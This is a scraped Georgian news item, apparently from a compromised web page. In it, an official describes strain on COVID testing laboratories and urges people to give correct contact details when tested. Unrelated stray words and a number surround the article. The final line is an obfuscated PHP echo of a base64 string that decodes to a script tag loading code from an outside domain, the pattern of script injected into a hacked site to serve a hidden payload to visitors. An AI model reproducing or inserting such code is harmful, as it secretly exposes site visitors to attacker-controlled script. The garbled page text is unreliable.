celsiusi
ავერსი შნაიდერი
"ლაბორატორიებთან დაკავშირებით გარკვეული პრობლემები შეიქმნა", - ამის შესახებ მთავრობის უწყებათშორის საბჭოსთან არსებული საოპერაციო შტაბის ხელმძღვანელმა გიორგი ღიბრაძემ საბჭოს სხდომის დასრულების შემდეგ გამართულ პრესკონფერენციაზე განაცხადა.
 
ის მოუწოდებს როგორც მოქალაქეებს, ისე ლაბორატორიებს, რომ ტესტის ჩატარების დროს საკონტაქტი ინფორმაციები სწორად მიუთითონ.
 
„ლაბორატორიებსა და მიმართვიანობასთან დაკავშირებით, ცხადია, შეიქმნა პრობლემები. მინდა მოვუწოდო ყველას, ვინც ტესტს იკეთებს, სწორად მიუთითონ საკონტაქტო ინფორმაცია ტესტირების გაკეთების დროს, რადგან შემდგომში თავიდან ავიცილოთ კონტაქტზე გასვლასთან დაკავშირებული პრობლემები, რაც ძალიან მნიშვნელოვანია. ლაბორატორიებისადმი მიმართვიანობა გაზრდილია, რაც პროცესს გარკვეულწილად ართულებს, თუმცა ავადობის მიმდინარეობა შესმსუბუქებულია, ძალიან ბევრი ადამიანი მკურნალობას ბინაზე გადის, ამიტომ ჰოსპიტალურ სექტორზე დაწოლა არ გაზრდილა“, - განაცხადა გიორგი ღიბრაძემ.
797
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");